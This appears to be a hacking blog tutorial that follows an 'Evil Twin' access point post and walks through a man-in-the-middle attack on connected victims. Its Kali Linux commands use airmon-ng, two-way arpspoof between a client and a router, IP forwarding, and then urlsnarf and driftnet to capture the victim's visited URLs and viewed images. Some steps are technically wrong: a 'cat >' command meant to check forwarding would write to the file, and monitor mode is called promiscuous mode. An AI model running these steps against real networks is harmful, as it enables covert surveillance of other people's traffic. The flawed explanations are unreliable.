Hello again to another Hacking Intro Tutorial.
Last week we created and powered up our own Evil Twin Access Point. Once you have people connecting to your Evil Twin you can intercept and analyze their traffic by conducting a Man-in-the-Middle Attack (MitM). For this tutorial, I will show you how to do a MitM Attack.
Before we jump right in let’s talk about what a MitM Attack is. To put it simply, a MitM Attack is where we put ourselves between the victim/client and the server s/he is connected to. We then would grab all traffic that passes by the connection between the two, otherwise known as sniffing.
So, let’s begin shall we?
Step 1: Promiscuous Mode
Like previous tutorials, we are going to want to make sure that our wireless adapter can be detected. In Kali Linux, open up a terminal and type in the following command:
root@kali: ~# iwconfig
The wireless adapter I am going to be putting in promiscuous mode is assigned as wlan1. I will do this by typing in the following:
root@kali: ~# airmon-ng start wlan1
You should be given a notification that the wireless adapter is now assigned to mon0.
Step 2: Client to Server
Our goal for conducting a MitM attack is to make the client believe that we are the server and for the server to believe we are the client. We will be using arpspoof to do this. In order to do this we will first want to open up two terminals.
Now, let’s say that the client and server have the following IP addresses:
Server: 192.168.0.1
Client: 192.168.0.27
We will want to replace the address of the server with our address. This way the client believes that we are the server. In one of the terminals, type in the following:
root@kali: ~# arpspoof -i wlan1 -t 192.168.0.27 -r 192.168.0.1
Where our interface (-i) will be the adapter we put in promiscuous mode. The target (-t) is the client’s IP Address and the router (-r) is our server’s IP Address.
Step 3: Server to Client
Next we would want to replace our the client’s IP Address with our IP Address so the server believes we are the client. To do this, we would simply just reverse the order of the client’s and server’s IP addresses. Go to the second open terminal and type in:
root@kali: ~# arpspoof -i wlan1 -t 192.168.0.1 -r 192.168.0.27
Now we will execute both commands.
You should get a similar message below for both terminals:
Step 4: Forwarding Packets
Now that we are impersonating both the client and the server, we will want to forward all data packets to the other machine. Meaning, we will be forwarding packets from the client to the “server” and forwarding packets from the server to the “client”.
We enable this in Kali Linux using ip_forward. The whole command we would type in would be:
root@kali: ~# echo 1 > /proc/sys/net/ipv4/ip_forward
Where 1 means to turn echo ON, and > directs it to ip_forward.
If you successfully enabled ip_forward you should not have received anything back. To assure that ip_forward is enabled we would want to type in:
root@kali: ~# cat > /proc/sys/net/ipv4/ip_forward
If it is enabled we should get a value of 1.
Our system, which is in the middle, will now be receiving all traffic between the client and sever.
Step 5: Reading Traffic
Now that we are receiving traffic between the client and server let’s read it. We will do this by typing in:
root@kali: ~# urlsnarf -i wlan1
I will now receive any URL’s the client goes to. One of my favorite parts about urlsnarf is that you can simply click on the URL to be taken directly to it.
Another nifty thing we can use is driftnet. Type in the following command to see what pictures the client is viewing:
root@kali: ~# driftnet -i wlan1
There are a lot more other sniffing tools you can play around with, such as dsniff and ettercap, that are also very fun and very useful. I would highly recommend checking them out if you want to explore sniffing further.
That’s it for this Hacking Intro Tutorial. For next tutorial we will be cracking into WEP networks